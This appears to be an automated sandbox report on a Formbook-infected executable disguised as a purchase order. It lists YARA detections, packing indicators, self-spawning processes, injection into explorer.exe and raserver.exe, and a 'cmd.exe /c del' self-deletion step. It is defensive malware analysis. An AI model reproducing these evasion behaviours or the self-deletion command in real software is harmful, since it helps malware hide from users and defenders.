Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041CE2B	5_2_0041CE2B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018CF900	5_2_018CF900
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E4120	5_2_018E4120
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DB090	5_2_018DB090
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F20A0	5_2_018F20A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019920A8	5_2_019920A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019928EC	5_2_019928EC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01981002	5_2_01981002
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199E824	5_2_0199E824
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018FEBB0	5_2_018FEBB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019803DA	5_2_019803DA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198DBD2	5_2_0198DBD2
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01992B28	5_2_01992B28
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019922AE	5_2_019922AE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018F2581	5_2_018F2581
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019925DD	5_2_019925DD
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018DD5E0	5_2_018DD5E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01992D07	5_2_01992D07
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018C0D20	5_2_018C0D20
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01991D55	5_2_01991D55
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018D841F	5_2_018D841F
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198D466	5_2_0198D466
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0199DFCE	5_2_0199DFCE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01991FF1	5_2_01991FF1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01992EF7	5_2_01992EF7
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0198D616	5_2_0198D616
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_018E6E30	5_2_018E6E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BE841F	9_2_04BE841F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9D466	9_2_04C9D466
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA25DD	9_2_04CA25DD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C02581	9_2_04C02581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BED5E0	9_2_04BED5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BD0D20	9_2_04BD0D20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA1D55	9_2_04CA1D55
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA2D07	9_2_04CA2D07
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA2EF7	9_2_04CA2EF7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF6E30	9_2_04BF6E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9D616	9_2_04C9D616
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CADFCE	9_2_04CADFCE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA1FF1	9_2_04CA1FF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA28EC	9_2_04CA28EC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BEB090	9_2_04BEB090
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C020A0	9_2_04C020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA20A8	9_2_04CA20A8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C91002	9_2_04C91002
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CAE824	9_2_04CAE824
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BF4120	9_2_04BF4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04BDF900	9_2_04BDF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA22AE	9_2_04CA22AE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C8FA2B	9_2_04C8FA2B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C903DA	9_2_04C903DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C9DBD2	9_2_04C9DBD2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C0EBB0	9_2_04C0EBB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04CA2B28	9_2_04CA2B28
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092C82E	9_2_0092C82E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092A2A6	9_2_0092A2A6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00918C1A	9_2_00918C1A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00918C60	9_2_00918C60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00912D90	9_2_00912D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092B504	9_2_0092B504
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092CE2B	9_2_0092CE2B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00912FB0	9_2_00912FB0

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 04BDB150 appears 45 times
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: String function: 018CB150 appears 45 times

Source: PO 367628usa.exe	Binary or memory string: OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.348314984.0000000004F80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.348709437.0000000005180000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000000.00000002.348407890.00000000050A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs PO 367628usa.exe
Source: PO 367628usa.exe	Binary or memory string: OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000002.00000002.340682480.00000000000D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
Source: PO 367628usa.exe	Binary or memory string: OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000003.00000000.341450128.00000000003F2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
Source: PO 367628usa.exe	Binary or memory string: OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000004.00000002.342956819.0000000000402000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
Source: PO 367628usa.exe	Binary or memory string: OriginalFilename vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000005.00000002.390665694.00000000019BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000005.00000002.389153954.0000000000E82000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
Source: PO 367628usa.exe, 00000005.00000002.391187229.00000000034F9000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameraserver.exej% vs PO 367628usa.exe
Source: PO 367628usa.exe	Binary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe

Source: PO 367628usa.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: PO 367628usa.exe

Static PE information: Section: ^8+S|rz ZLIB complexity 1.00031485501

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/1@9/4

Source: C:\Users\user\Desktop\PO 367628usa.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 367628usa.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01

Source: C:\Users\user\Desktop\PO 367628usa.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: PO 367628usa.exe

Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\PO 367628usa.exe

File read: C:\Users\user\Desktop\PO 367628usa.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO 367628usa.exe 'C:\Users\user\Desktop\PO 367628usa.exe'
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process created: C:\Users\user\Desktop\PO 367628usa.exe C:\Users\user\Desktop\PO 367628usa.exe	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 367628usa.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO 367628usa.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO 367628usa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO 367628usa.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO 367628usa.exe, 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.590539014.0000000004BB0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO 367628usa.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: PO 367628usa.exe, 00000005.00000002.391160036.00000000034E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.372619692.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PO 367628usa.exe

Unpacked PE file: 0.2.PO 367628usa.exe.4b0000.0.unpack ^8+S|rz:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: PO 367628usa.exe	Static PE information: section name: ^8+S\|rz
Source: PO 367628usa.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD0B91 pushfd ; iretd	0_2_00DD0B9E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD436F push edx; retf	0_2_00DD4373
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD4365 push edx; retf	0_2_00DD4369
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EA96E push ebx; retf	0_2_054EA96F
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EA964 push ebx; retf	0_2_054EA965
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E3390 push 83085F8Bh; ret	0_2_054E33F6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C6732C push E8C84D8Bh; iretd	0_2_05C672ED
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5632 push cs; retf	2_2_000D5642
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D304A push ds; retf	2_2_000D30A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5668 push cs; retf	2_2_000D567E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5A6A push ss; retf	2_2_000D5A6E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5680 push cs; retf	2_2_000D56C0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5BA2 push ds; retf	2_2_000D5BA6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5BB4 push ds; retf	2_2_000D5BC4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D53B6 push cs; retf	2_2_000D5642
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 2_2_000D5BC6 push ds; retf	2_2_000D5BCA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5632 push cs; retf	3_2_003F5642
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5A6A push ss; retf	3_2_003F5A6E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5668 push cs; retf	3_2_003F567E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F304A push ds; retf	3_2_003F30A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F53B6 push cs; retf	3_2_003F5642
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5BB4 push ds; retf	3_2_003F5BC4
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5BA2 push ds; retf	3_2_003F5BA6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5680 push cs; retf	3_2_003F56C0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 3_2_003F5BC6 push ds; retf	3_2_003F5BCA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_0040304A push ds; retf	4_2_004030A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_00405668 push cs; retf	4_2_0040567E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_00405A6A push ss; retf	4_2_00405A6E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_00405632 push cs; retf	4_2_00405642
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_00405BC6 push ds; retf	4_2_00405BCA
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 4_2_00405680 push cs; retf	4_2_004056C0

Source: initial sample

Static PE information: section name: ^8+S|rz entropy: 7.99978876077

Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO 367628usa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
